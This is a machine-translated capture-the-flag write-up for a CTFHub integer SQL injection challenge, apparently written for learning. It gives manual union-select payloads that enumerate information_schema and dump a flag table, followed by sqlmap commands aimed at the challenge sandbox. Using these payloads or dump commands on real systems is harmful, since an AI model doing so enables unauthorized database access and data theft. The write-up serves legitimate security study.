Do it for the first time SQL Inject , It's really hard . I can't even understand the steps of manual injection , I actually use tools directly sqlmap, Then type a few lines of code .

Let's start with manual injection ：

union select The joint query , Joint injection is commonly used
database() Echo the currently connected database
version() View the current sql The version of ：mysql 1.2.3, mariadb-4.5.6
group_concat() Use the values in the generated same group with , Connect , Form a string
information_schema Saved a lot mysql Database of information
information_schema.schemata information_schema A table of the library , be known as schemata
schema_name schemata Table storage mysql All database name fields
information_schema.tables Save mysql All the watches
table_schema tables The database name field corresponding to each table is stored in the table
table_name The name of the table and table_schema One-to-one correspondence
information_schema.columns columns The table stores the information of all columns 4
column_name When you know the name of a watch , All field names in the table can be obtained through secondary fields ( Name )
table_name The name of the table and column_name One-to-one correspondence
select updatexml(1,concat(0x7e,database(),0x7e),1); Note here , Only in databse() Correct the content you want, and then the error will be echoed
right(str, num) The string is intercepted from the right num Characters
left(str,num) Empathy : The string is intercepted from the left num Characters
substr(str,N,M) character string , From N Character start , Intercept M Characters

And some basic sql grammar
And some basic notes ：
#,– Space ,/* */

First open the topic , Know the integer injection of this problem ,
So there are no quotes
So we use ：
1
1 and 1=1
1 and 1=2
To test whether there is sql Loophole

obtain ：

Find out 1 and 1 and 1=1, Echo the same
and 1 and 1=2, No echo
Come to the conclusion , Executed logical statements and , So there is sql Loophole

therefore , We can construct sql sentence ：
1 order by 1
1 order by 2
1 order by 3
See how many fields , obtain ：

So I used union select Joint injection
Here should be union Repetition is not allowed
therefore id Use an empty , I will use it. ：520
Construction statement ：
520 union select 1,2

See that the function we entered is executed ,
So look at the database in the construction statement ：

520 union select 1,group_concat(schema_name) from information_schema.schemata limit 1

See all database names ：

  Check the current database name in the construction statement ：
520 union select 1,database()

  Get the current database ：sqli
View the database in the construction statement sqli Table name in ：
520 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘sqli’ limit 1

Get the name of the watch , among flag The table shows the value we want
So construct a statement to view flag Field name in ：

520 union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘sqli’ and table_name=‘flag’ limit 1

Get the fields flag, So construct a statement query field ：

520 union select 1, group_concat(flag) from sqli.flag limit 1

obtain flag:

Then is sqlmap Used ：

First step ： view the database

python sqlmap -u "http://challenge-97a3e176a7437521.sandbox.ctfhub.com:10800/?id=1" --batch --dbs

  The second step ： View tables in the database

python sqlmap -u "http://challenge-97a3e176a7437521.sandbox.ctfhub.com:10800/?id=1" --batch --tables -D sqli

The third step ： View the contents of the table

python sqlmap -u "http://challenge-97a3e176a7437521.sandbox.ctfhub.com:10800/?id=1" --batch --dump -T flag -D sqli

flag To get

Reference link ：

ctfhub Integer Injection

http://t.csdn.cn/NuIGR

【CTFHub】sql Inject - Integer Injection https://www.jianshu.com/p/05b33402afe9

ps: The tools are really convenient , But we still need to continue to learn some basic database operations , also SQL Basic knowledge of injection